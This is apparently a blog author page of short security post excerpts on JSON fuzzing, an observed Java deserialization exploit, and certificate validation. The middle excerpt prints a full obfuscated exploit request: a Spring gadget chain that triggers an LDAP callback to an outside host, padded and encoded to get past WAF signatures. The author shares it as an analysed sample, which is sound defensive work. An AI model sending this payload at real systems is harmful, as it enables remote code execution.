Fuzzing is everything ;) It’s the most useful and productive hacking technique for sure. At the same time, fuzzing is not just randomly hitting applications or binaries with random bytes.

It’s more about ideas, a deep understanding of data formats and application flows, technology stacks, and a lot of other things. It’s more about assumptions on how the particular application was designed and built than about randomness.

In this series of posts, I want to share some experience with JSON fuzzing that I have gained over the last 12 years of security audits.

Data types mutations

First of all, JSON is a serialization format, not a string. This means that you can play with data types even at the parser level. …

I’ve just found a variant of a Struts exploit that surprised me with its obfuscation technique:

GET /?%01%00java.util.HashMa%f0%01%02%01%01org.springframework.aop.target.HotSwappableTargetSourc%e5%01%01%02%ef%01org.springframework.aop.aspectj.autoproxy.AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolder%01%01%03org.springframework.aop.aspectj.AspectJPointcutAdviso%f2%01%01%04org.springframework.aop.aspectj.AspectJAroundAdvic%e5%01%00%00%00%01%05%cc%01org.springframework.aop.aspectj.annotation.BeanFactoryAspectInstanceFactory%01%00%01%06org.springframework.jndi.support.SimpleJndiBeanFactor%f9%01%01%07org.springframework.jndi.JndiTemplat%e5%01%00%01%08org.apache.commons.logging.impl.NoOpLo%e7%01%01%08%01%01%01%00%01%00%01%09java.util.HashSe%f4%01%01%03%01%c9%03ldap%3a%2f%2fxxxxxxxxxxxxxxxxxxxxxxxxx.burpcollaborator.net%2f%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%01%00%01%00%0e%00%00%01%01%0ajava.lang.Objec%f4%00%00%00%00%00%00%01toStrin%e7%01%01%00%00%00%00%00%00%01%01%03%01%01%01%01%0bcom.sun.org.apache.xpath.internal.objects.XStrin%e7%01%03%01%85%ee%ac%a5%00%17%10%00%01%01%13=1 HTTP/1.1

Do you have any thoughts on what it is? It seems like Java is ignoring %01 bytes within Unicode sequences, doesn’t it?

I’m pretty sure that the only reason to use such comprehensive obfuscation is to bypass signatures in WAFs/IPS/IDS/etc. So it seems that somebody really knows how to cook up bypasses for deserialization exploits, at least.

BTW, which Spring vulnerability takes exploits right from the URI? Or is this the new https://nvd.nist.gov/vuln/detail/CVE-2019-9212 Hessian RCE being exploited in the wild?

In the first story, I described some issues related to client certificate authentication implementations in environments with load balancers. This time I’d like to mention some typical issues in custom certificate validation processes, where a developer does the validation in application code.

Let’s formalize the task as custom authentication based on user certificates. Now, let’s break this task down from the architecture perspective:

  • all the crypto should be handled by third-party libraries
  • all the business logic should be implemented by yourself
  • the PKI library will check the certificate and give you some details about the…


Ivan Novikov

CEO at Wallarm. Application security platform to prevent threats and discover vulnerabilities in a real-time.
